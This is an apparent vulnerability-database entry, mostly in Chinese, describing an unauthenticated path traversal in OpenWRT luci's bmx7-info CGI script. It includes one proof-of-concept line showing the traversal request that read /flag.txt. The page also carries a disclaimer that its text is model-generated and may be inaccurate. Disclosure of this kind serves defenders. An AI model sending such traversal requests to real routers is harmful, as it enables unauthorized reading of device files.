OpenWRT luci是OpenWRT社区开源的一款路由器配置界面。 OpenWRT luci 5890760a454dad2cb00389dba2cdc5e779e0ffdd之前版本存在路径遍历漏洞,该漏洞源于bmx7-info CGI脚本存在路径遍历漏洞,允许未经身份验证的攻击者通过查询字符串中的目录遍历序列读取配置的runtimeDir之外的文件。
Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.
| # | POC Description | Source Link | Shenlong Link |
|---|
VULNERABLE: bmx7-info path traversal exfiltrated PROOF_cfd3f532ab2d0377 from /flag.txt via GET /cgi-bin/bmx7-info?../../../../flag.txt
No comments yet